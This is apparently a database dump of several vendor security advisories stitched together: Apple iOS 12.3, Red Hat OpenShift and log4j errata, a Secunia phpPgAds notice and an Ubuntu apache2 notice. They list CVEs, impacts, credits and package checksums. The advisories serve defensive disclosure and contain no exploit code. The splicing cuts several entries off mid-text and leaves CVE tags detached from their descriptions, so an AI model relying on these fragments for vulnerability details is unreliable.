APPLE-SA-2019-5-13-1 iOS 12.3
iOS 12.3 is now available and addresses the following:
AppleFileConduit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8593: Dany Lisiansky (@DanyL931)
Contacts
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to read restricted memory
Description: An input validation issue was addressed with improved
input validation.
CVE-2019-8598: Omer Gull of Checkpoint Research
CoreAudio
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted movie file may lead to
arbitrary code execution
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8585: riusksk of VulWar Corp working with Trend Micro's Zero
Day Initiative
Disk Images
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-8560: Nikita Pupyshev of Bauman Moscow State Technological
University
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to execute arbitrary code
with system privileges
Description: A use after free issue was addressed with improved
memory management.
CVE-2019-8605: Ned Williamson working with Google Project Zero
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to cause unexpected system
termination or read kernel memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2019-8576: Brandon Azad of Google Project Zero, unho Jang and
Hanul Choi of LINE Security Team
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to cause unexpected system
termination or write kernel memory
Description: A type confusion issue was addressed with improved
memory handling.
CVE-2019-8591: Ned Williamson working with Google Project Zero
Lock Screen
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A person with physical access to an iOS device may be able to
see the email address used for iTunes
Description: A logic issue was addressed with improved restrictions.
CVE-2019-8599: Jeremy Peña-Lopez (aka Radio) of the University of
North Florida
Mail
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted message may lead to a denial
of service
Description: An input validation issue was addressed with improved
input validation.
CVE-2019-8626: Natalie Silvanovich of Google Project Zero
Mail Message Framework
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A remote attacker may be able to cause arbitrary code
execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2019-8613: Natalie Silvanovich of Google Project Zero
MobileInstallation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to modify protected parts of the
file system
Description: A validation issue existed in the handling of symlinks.
CVE-2019-8568: Dany Lisiansky (@DanyL931)
MobileLockdown
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to gain root privileges
Description: An input validation issue was addressed with improved
input validation.
CVE-2019-8637: Dany Lisiansky (@DanyL931)
Photos Storage
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A sandboxed process may be able to circumvent sandbox
restrictions
Description: An access issue was addressed with additional sandbox
restrictions.
CVE-2019-8617: an anonymous researcher
SQLite
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to gain elevated privileges
Description: An input validation issue was addressed with improved
memory handling.
CVE-2019-8577: Omer Gull of Checkpoint Research
SQLite
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A maliciously crafted SQL query may lead to arbitrary code
execution
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2019-8600: Omer Gull of Checkpoint Research
SQLite
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to read restricted memory
Description: An input validation issue was addressed with improved
input validation.
CVE-2019-8598: Omer Gull of Checkpoint Research
SQLite
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A memory corruption issue was addressed by removing the
vulnerable code.
CVE-2019-8602: Omer Gull of Checkpoint Research
Status Bar
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: The lock screen may show a locked icon after unlocking
Description: The issue was addressed with improved UI handling.
CVE-2019-8630: Jon M. Morlan
StreamingZip
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to modify protected parts of the
file system
Description: A validation issue existed in the handling of symlinks.
CVE-2019-8568: Dany Lisiansky (@DanyL931)
sysdiagnose
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2019-8574: Dayton Pidhirney (@_watbulb) of Seekintoo (@seekintoo)
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may result in the
disclosure of process memory
Description: An out-of-bounds read was addressed with improved input
validation.
CVE-2019-8607: Junho Jang and Hanul Choi of LINE Security Team
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2019-6237: G. Geshev from MWR Labs working with Trend Micro's
Zero Day Initiative
CVE-2019-8619: Wen Xu of SSLab at Georgia Tech and
Hanqing Zhao of Chaitin Security Research Lab
CVE-2019-8622: Samuel Groß of Google Project Zero
CVE-2019-8623: Samuel Groß of Google Project Zero
CVE-2019-8628: Wen Xu of SSLab at Georgia Tech and
Hanqing Zhao of Chaitin Security Research Lab
Wi-Fi
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A device may be passively tracked by its WiFi MAC address
Description: A user privacy issue was addressed by removing the
broadcast MAC address.
CVE-2019-8620: David Kreitschmann and Milan Stute of Secure Mobile
Networking Lab at Technische Universität Darmstadt
Additional recognition
Clang
We would like to acknowledge Brandon Azad of Google Project Zero for
their assistance.
CoreFoundation
We would like to acknowledge Vozzie and Rami and m4bln, Xiangqian
Zhang, Huiming Liu of Tencent's Xuanwu Lab for their assistance.
Kernel
We would like to acknowledge Brandon Azad of Google Project Zero and
an anonymous researcher for their assistance.
MediaLibrary
We would like to acknowledge Angel Ramirez and Min (Spark) Zheng,
Xiaolong Bai of Alibaba Inc. for their assistance.
MobileInstallation
We would like to acknowledge Yiğit Can YILMAZ (@yilmazcanyigit) for
their assistance.
Safari
We would like to acknowledge Ben Guild (@benguild) for their
assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About. The version after applying this update
will be "iOS 12.3".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlzZrUopHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3FJJxAA
hLu4GEYEBPNLxDWhh49P7k7pe33N8cguJw2iPt6sYkF9swBwzL1AC1y0WiNJejGT
Y0PPMG7evpaEVGQwCZvHarNT4g35OUeHdHy4gYAIPfTY15G25jmELL4YTJutWQ0O
z6KseXhEq9EqpHKlsT5Q6QOEoUyXVHan33d+H9+4t/jQHFvDqMmwHWO7bKlYyhWW
ctG8jbXSgy/OFjSrmbPhfbBfDXQHah8GsFGJAFtlWk+UtQhXNifJT1tj9XAKDtGK
V5EQ/hYkYRyyeNPXLiZ/wn6Jesbg8QIrmZB2RHAl1w8XZZY2Gsd1//dTXqn1LkqK
gwOV0+Vs//LJwIqix435KKc0ULMwJjIfKy9whzPyf+4lqcD4kx4OdQrakZz4+L7g
4ZZeeyJ0LFFnO4eavtn6lVrYcTXVhJlRkJ6cWZcf9Dfr28bPTSSHda1Nd9quZFJn
QPFt7CHRPL1MelgfDKZNeTy7WUDnoTwbdMZCyd0MszCxCeaSahny7066jmfKyXGI
OoQQyyz96OmBABcqG3WeCRSeJ3ymmoy2d+JzjA4boIHo4k+nq5ifKikyI8qiHIBB
uS3K3DEzMSj/0u2vNcDMjQ6vogbxeWnK8fxCCxkfedYZEdHg4Oj4lK1HStbhweoJ
cB3S2pWUIPt8HRcnbUYgypZ0ZJgtnTom+0mgi3a0+64=
=fsAj
-----END PGP SIGNATURE-----
. Description:
Red Hat OpenShift Container Platform is Red Hat's cloud computing
Kubernetes application platform solution designed for on-premise or private
cloud deployments.
Security Fix(es):
* golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows
for panic (CVE-2020-9283)
* SSL/TLS: CBC padding timing attack (lucky-13) (CVE-2013-0169)
* grafana: XSS vulnerability via a column style on the "Dashboard > Table
Panel" screen (CVE-2018-18624)
* js-jquery: prototype pollution in object's prototype leading to denial of
service or remote code execution or property injection (CVE-2019-11358)
* npm-serialize-javascript: XSS via unsafe characters in serialized regular
expressions (CVE-2019-16769)
* kibana: Prototype pollution in TSVB could result in arbitrary code
execution (ESA-2020-06) (CVE-2020-7013)
* nodejs-minimist: prototype pollution allows adding or modifying
properties of Object.prototype using a constructor or __proto__ payload
(CVE-2020-7598)
* npmjs-websocket-extensions: ReDoS vulnerability in
Sec-WebSocket-Extensions parser (CVE-2020-7662)
* nodejs-lodash: prototype pollution in zipObjectDeep function
(CVE-2020-8203)
* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter
method (CVE-2020-11022)
* jQuery: passing HTML containing <option> elements to manipulation methods
could result in untrusted code execution (CVE-2020-11023)
* grafana: stored XSS (CVE-2020-11110)
* grafana: XSS annotation popup vulnerability (CVE-2020-12052)
* grafana: XSS via column.title or cellLinkTooltip (CVE-2020-12245)
* nodejs-elliptic: improper encoding checks allows a certain degree of
signature malleability in ECDSA signatures (CVE-2020-13822)
* golang.org/x/text: possibility to trigger an infinite loop in
encoding/unicode could lead to crash (CVE-2020-14040)
* nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate
function (CVE-2020-15366)
* openshift/console: text injection on error page via crafted url
(CVE-2020-10715)
* kibana: X-Frame-Option not set by default might lead to clickjacking
(CVE-2020-10743)
* openshift: restricted SCC allows pods to craft custom network packets
(CVE-2020-14336)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section. Solution:
For OpenShift Container Platform 4.6 see the following documentation, which
will be updated shortly for this release, for important instructions on how
to upgrade your cluster and fully apply this asynchronous errata update:
https://docs.openshift.com/container-platform/4.6/release_notes/ocp-4-6-rel
ease-notes.html
Details on how to access this content are available at
https://docs.openshift.com/container-platform/4.6/updating/updating-cluster
- -cli.html. Bugs fixed (https://bugzilla.redhat.com/):
907589 - CVE-2013-0169 SSL/TLS: CBC padding timing attack (lucky-13)
1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection
1767665 - CVE-2020-10715 openshift/console: text injection on error page via crafted url
1804533 - CVE-2020-9283 golang.org/x/crypto: Processing of crafted ssh-ed25519 public keys allows for panic
1813344 - CVE-2020-7598 nodejs-minimist: prototype pollution allows adding or modifying properties of Object.prototype using a constructor or __proto__ payload
1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method
1834550 - CVE-2020-10743 kibana: X-Frame-Option not set by default might lead to clickjacking
1845982 - CVE-2020-7662 npmjs-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser
1848089 - CVE-2020-12052 grafana: XSS annotation popup vulnerability
1848092 - CVE-2019-16769 npm-serialize-javascript: XSS via unsafe characters in serialized regular expressions
1848643 - CVE-2020-12245 grafana: XSS via column.title or cellLinkTooltip
1848647 - CVE-2020-13822 nodejs-elliptic: improper encoding checks allows a certain degree of signature malleability in ECDSA signatures
1849044 - CVE-2020-7013 kibana: Prototype pollution in TSVB could result in arbitrary code execution (ESA-2020-06)
1850004 - CVE-2020-11023 jquery: Passing HTML containing <option> elements to manipulation methods could result in untrusted code execution
1850572 - CVE-2018-18624 grafana: XSS vulnerability via a column style on the "Dashboard > Table Panel" screen
1853652 - CVE-2020-14040 golang.org/x/text: possibility to trigger an infinite loop in encoding/unicode could lead to crash
1857412 - CVE-2020-8203 nodejs-lodash: prototype pollution in zipObjectDeep function
1857977 - CVE-2020-15366 nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function
1858981 - CVE-2020-14336 openshift: restricted SCC allows pods to craft custom network packets
1861044 - CVE-2020-11110 grafana: stored XSS
1874671 - CVE-2020-14336 ose-machine-config-operator-container: openshift: restricted SCC allows pods to craft custom network packets [openshift-4]
5 |
|
var-200809-0009
|
ImageIO in Apple Mac OS X 10.4.11 and 10.5 through 10.5.4 allows context-dependent attackers to cause a denial of service (memory corruption and application crash) or execute arbitrary code via a crafted TIFF image. Apple Mac OS X Leopard does not accurately reflect which files and directories are available via sharing. A vulnerability in a common PHP extension module could allow a remote attacker to execute code on a vulnerable system.
The security update addresses a total of 17 new vulnerabilities that affect the Apple Type Services, Directory Services, Finder, ImageIO, Kernel, Login Windows, SearchKit, System Configuration, System Preferences, Time Machine, VideoConference, and Wiki Server components of Mac OS X. The advisory also contains security updates for 17 previously reported issues.
----------------------------------------------------------------------
Bist Du interessiert an einem neuen Job in IT-Sicherheit?
Secunia hat zwei freie Stellen als Junior und Senior Spezialist in IT-
Sicherheit:
http://secunia.com/secunia_vacancies/
----------------------------------------------------------------------
TITLE:
phpPgAds XML-RPC PHP Code Execution Vulnerability
SECUNIA ADVISORY ID:
SA15884
VERIFY ADVISORY:
http://secunia.com/advisories/15884/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
>From remote
SOFTWARE:
phpPgAds 2.x
http://secunia.com/product/4577/
DESCRIPTION:
A vulnerability has been reported in phpPgAds, which can be exploited
by malicious people to compromise a vulnerable system.
For more information:
SA15852
SOLUTION:
Update to version 2.0.5.
http://sourceforge.net/project/showfiles.php?group_id=36679
OTHER REFERENCES:
SA15852:
http://secunia.com/advisories/15852/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
|
|
var-201704-1589
|
In Apache Log4j 2.x before 2.8.2, when using the TCP socket server or UDP socket server to receive serialized log events from another application, a specially crafted binary payload can be sent that, when deserialized, can execute arbitrary code. Apache Log4j Contains a vulnerability in the deserialization of unreliable data.Information is obtained, information is altered, and service operation is disrupted (DoS) An attack may be carried out. Apache Log4j is a Java-based open source logging tool developed by the Apache Software Foundation. A code issue vulnerability exists in Apache Log4j 2.x versions prior to 2.8.2. An attacker could exploit this vulnerability to execute arbitrary code. Description:
Red Hat JBoss Web Server is a fully integrated and certified set of
components for hosting Java web applications. It is comprised of the Apache
HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat Connector
(mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and the Tomcat
Native library.
This release of Red Hat JBoss Web Server 3.1 Service Pack 1 serves as a
replacement for Red Hat JBoss Web Server 3.1, and includes bug fixes, which
are documented in the Release Notes document linked to in the References. (CVE-2017-5645)
* A vulnerability was discovered in tomcat's handling of pipelined requests
when "Sendfile" was used. If sendfile processing completed quickly, it was
possible for the Processor to be added to the processor cache twice. This
could lead to invalid responses or information disclosure. (CVE-2017-5647)
* A vulnerability was discovered in the error page mechanism in Tomcat's
DefaultServlet implementation. A crafted HTTP request could cause undesired
side effects, possibly including the removal or replacement of the custom
error page. (CVE-2017-5664)
* A vulnerability was discovered in tomcat. When running an untrusted
application under a SecurityManager it was possible, under some
circumstances, for that application to retain references to the request or
response objects and thereby access and/or modify information associated
with another web application. (CVE-2017-5648)
4. Solution:
Before applying the update, back up your existing Red Hat JBoss Web Server
installation (including all applications and configuration files). Bugs fixed (https://bugzilla.redhat.com/):
1441205 - CVE-2017-5647 tomcat: Incorrect handling of pipelined requests when send file was used
1441223 - CVE-2017-5648 tomcat: Calls to application listeners did not use the appropriate facade object
1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability
1459158 - CVE-2017-5664 tomcat: Security constrained bypass in error page mechanism
6. JIRA issues fixed (https://issues.jboss.org/):
JWS-657 - tomcat-native installs RHEL apr in addition to jbcs-httpd24-httpd-libs
JWS-667 - Subject incorrectly removed from user session
JWS-695 - tomcat7_t and tomcat8_t domains are in unconfined_domain
JWS-709 - RPM missing selinux-policy dependency
JWS-716 - Backport 60087 for Tomcat 8
JWS-717 - RFC 7230/3986 url requirement that prevents unencoded curly braces should be optional, since it breaks existing sites
JWS-721 - CORS filter Vary header missing
JWS-725 - /usr/share/tomcat7 needs world execute permissions to function on openshift v2
JWS-741 - Configurations in conf.d are not applied
JWS-760 - [ASF BZ 59961] Provide an option to enable/disable processing of Class-Path entry in a jar's manifest file
7.
(CVE-2017-7525)
Red Hat would like to thank Liao Xinxi (NSFOCUS) for reporting
CVE-2017-7525.
The References section of this erratum contains a download link (you must
log in to download the update). Description:
The eap7-jboss-ec2-eap packages provide scripts for Red Hat JBoss
Enterprise Application Platform running on the Amazon Web Services (AWS)
Elastic Compute Cloud (EC2). (CVE-2017-5645)
* A vulnerability was found in Jasypt that would allow an attacker to
perform a timing attack on password hash comparison. (CVE-2014-9970)
* It was found that an information disclosure flaw in Bouncy Castle could
enable a local malicious application to gain access to user's private
information. (CVE-2015-6644)
* It was found that while parsing the SAML messages the StaxParserUtil
class of Picketlink replaces special strings for obtaining attribute values
with system property. This could allow an attacker to determine values of
system properties at the attacked system by formatting the SAML request ID
field to be the chosen system property which could be obtained in the
"InResponseTo" field in the response. (CVE-2017-2582)
* It was found that when the security manager's reflective permissions,
which allows it to access the private members of the class, are granted to
Hibernate Validator, a potential privilege escalation can occur. By
allowing the calling code to access those private members without the
permission an attacker may be able to validate an invalid instance and
access the private member value via ConstraintViolation#getInvalidValue(). JIRA issues fixed (https://issues.jboss.org/):
JBEAP-11487 - jboss-ec2-eap for EAP 7.0.8
7.
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
=====================================================================
Red Hat Security Advisory
Synopsis: Important: rh-java-common-log4j security update
Advisory ID: RHSA-2017:1417-01
Product: Red Hat Software Collections
Advisory URL: https://access.redhat.com/errata/RHSA-2017:1417
Issue date: 2017-06-08
CVE Names: CVE-2017-5645
=====================================================================
1. Summary:
An update for rh-java-common-log4j is now available for Red Hat Software
Collections.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6) - noarch
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7) - noarch
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7) - noarch
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3) - noarch
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6) - noarch
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7) - noarch
3. Description:
Log4j is a tool to help the programmer output log statements to a variety
of output targets. (CVE-2017-5645)
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
5. Bugs fixed (https://bugzilla.redhat.com/):
1443635 - CVE-2017-5645 log4j: Socket receiver deserialization vulnerability
6. Package List:
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 6):
Source:
rh-java-common-log4j-1.2.17-15.15.el6.src.rpm
noarch:
rh-java-common-log4j-1.2.17-15.15.el6.noarch.rpm
rh-java-common-log4j-javadoc-1.2.17-15.15.el6.noarch.rpm
rh-java-common-log4j-manual-1.2.17-15.15.el6.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 6.7):
Source:
rh-java-common-log4j-1.2.17-15.15.el6.src.rpm
noarch:
rh-java-common-log4j-1.2.17-15.15.el6.noarch.rpm
rh-java-common-log4j-javadoc-1.2.17-15.15.el6.noarch.rpm
rh-java-common-log4j-manual-1.2.17-15.15.el6.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 6):
Source:
rh-java-common-log4j-1.2.17-15.15.el6.src.rpm
noarch:
rh-java-common-log4j-1.2.17-15.15.el6.noarch.rpm
rh-java-common-log4j-javadoc-1.2.17-15.15.el6.noarch.rpm
rh-java-common-log4j-manual-1.2.17-15.15.el6.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server (v. 7):
Source:
rh-java-common-log4j-1.2.17-15.15.el7.src.rpm
noarch:
rh-java-common-log4j-1.2.17-15.15.el7.noarch.rpm
rh-java-common-log4j-javadoc-1.2.17-15.15.el7.noarch.rpm
rh-java-common-log4j-manual-1.2.17-15.15.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Server EUS (v. 7.3):
Source:
rh-java-common-log4j-1.2.17-15.15.el7.src.rpm
noarch:
rh-java-common-log4j-1.2.17-15.15.el7.noarch.rpm
rh-java-common-log4j-javadoc-1.2.17-15.15.el7.noarch.rpm
rh-java-common-log4j-manual-1.2.17-15.15.el7.noarch.rpm
Red Hat Software Collections for Red Hat Enterprise Linux Workstation (v. 7):
Source:
rh-java-common-log4j-1.2.17-15.15.el7.src.rpm
noarch:
rh-java-common-log4j-1.2.17-15.15.el7.noarch.rpm
rh-java-common-log4j-javadoc-1.2.17-15.15.el7.noarch.rpm
rh-java-common-log4j-manual-1.2.17-15.15.el7.noarch.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2017-5645
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2017 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iD8DBQFZOQMQXlSAg2UNWIIRAgwvAJ9zqVY6yvhkuO8Uqdtyu86+9P1VIgCgtBhf
ceYEsokMPo3LCY/99DiysrI=
=wZ5c
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://www.redhat.com/mailman/listinfo/rhsa-announce
|
|
var-200911-0398
|
The TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a "plaintext injection" attack, aka the "Project Mogul" issue. Hitachi Web Server for, SSL There is a vulnerability in which arbitrary data is inserted at the beginning of communication data when using the function.Arbitrary data may be inserted at the beginning of communication data by a third party. A vulnerability exists in SSL and TLS protocols that may allow attackers to execute an arbitrary HTTP transaction.
SOLUTION:
Apply updates (please see the vendor's advisory for details). ===========================================================
Ubuntu Security Notice USN-860-1 November 19, 2009
apache2 vulnerabilities
CVE-2009-3094, CVE-2009-3095, CVE-2009-3555
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 6.06 LTS
Ubuntu 8.04 LTS
Ubuntu 8.10
Ubuntu 9.04
Ubuntu 9.10
This advisory also applies to the corresponding versions of
Kubuntu, Edubuntu, and Xubuntu.
The problem can be corrected by upgrading your system to the
following package versions:
Ubuntu 6.06 LTS:
apache2-common 2.0.55-4ubuntu2.9
Ubuntu 8.04 LTS:
apache2.2-common 2.2.8-1ubuntu0.14
Ubuntu 8.10:
apache2.2-common 2.2.9-7ubuntu3.5
Ubuntu 9.04:
apache2.2-common 2.2.11-2ubuntu2.5
Ubuntu 9.10:
apache2.2-common 2.2.12-1ubuntu2.1
In general, a standard system upgrade is sufficient to effect the
necessary changes.
Details follow:
Marsh Ray and Steve Dispensa discovered a flaw in the TLS and SSLv3
protocols. The flaw is with TLS renegotiation and
potentially affects any software that supports this feature. Attacks
against the HTTPS protocol are known, with the severity of the issue
depending on the safeguards used in the web application. Until the TLS
protocol and underlying libraries are adjusted to defend against this
vulnerability, a partial, temporary workaround has been applied to Apache
that disables client initiated TLS renegotiation. This update does not
protect against server initiated TLS renegotiation when using
SSLVerifyClient and SSLCipherSuite on a per Directory or Location basis.
Users can defend againt server inititiated TLS renegotiation attacks by
adjusting their Apache configuration to use SSLVerifyClient and
SSLCipherSuite only on the server or virtual host level. (CVE-2009-3555)
It was discovered that mod_proxy_ftp in Apache did not properly sanitize
its input when processing replies to EPASV and PASV commands. An attacker
could use this to cause a denial of service in the Apache child process.
(CVE-2009-3094)
Another flaw was discovered in mod_proxy_ftp.
(CVE-2009-3095)
Updated packages for Ubuntu 6.06 LTS:
Source archives:
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.9.diff.gz
Size/MD5: 130638 5d172b0ca228238e211940fad6b0935d
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.9.dsc
Size/MD5: 1156 a6d575c4c0ef0ef9c4c77e7f6ddfb02d
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55.orig.tar.gz
Size/MD5: 6092031 45e32c9432a8e3cf4227f5af91b03622
Architecture independent packages:
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-doc_2.0.55-4ubuntu2.9_all.deb
Size/MD5: 2125884 643115e9135b9bf626f3a65cfc5f2ed3
amd64 architecture (Athlon64, Opteron, EM64T Xeon):
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.9_amd64.deb
Size/MD5: 834492 818915da9848657833480b1ead6b4a12
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.9_amd64.deb
Size/MD5: 229578 9086ac3033e0425ecd150b31b377ee76
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.9_amd64.deb
Size/MD5: 224594 85a4480344a072868758c466f6a98747
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.9_amd64.deb
Size/MD5: 229128 446b52088b9744fb776e53155403a474
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.9_amd64.deb
Size/MD5: 172850 17e4cd95ecb9d0390274fca9625c2e5e
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-threaded-dev_2.0.55-4ubuntu2.9_amd64.deb
Size/MD5: 173636 b501407d01fa07e5807c28cd1db16cd7
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-utils_2.0.55-4ubuntu2.9_amd64.deb
Size/MD5: 95454 a06ee30ec14b35003ebcb821624bc2af
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2_2.0.55-4ubuntu2.9_amd64.deb
Size/MD5: 37510 4c063b1b8d831ea8a02d5ec691995dec
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0-dev_2.0.55-4ubuntu2.9_amd64.deb
Size/MD5: 287048 9cdc7502ebc526d4bc7df9b59a9d8925
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/libapr0_2.0.55-4ubuntu2.9_amd64.deb
Size/MD5: 145624 4b613a57da2ca57678e8c8f0c1628556
i386 architecture (x86 compatible Intel/AMD):
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-common_2.0.55-4ubuntu2.9_i386.deb
Size/MD5: 787870 67b1855dc984e5296ac9580e2a2f0a0c
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-perchild_2.0.55-4ubuntu2.9_i386.deb
Size/MD5: 204122 edf40b0ff5c1824b2d6232da247ce480
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-prefork_2.0.55-4ubuntu2.9_i386.deb
Size/MD5: 200060 6267a56fcef78f6300372810ce36ea41
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-mpm-worker_2.0.55-4ubuntu2.9_i386.deb
Size/MD5: 203580 c487929bbf45b5a4dc3d035d86f7b3a0
http://security.ubuntu.com/ubuntu/pool/main/a/apache2/apache2-prefork-dev_2.0.55-4ubuntu2.9_i386.deb
Size/MD5: 172876 bae257127c3d137e407a7db744f3d57a
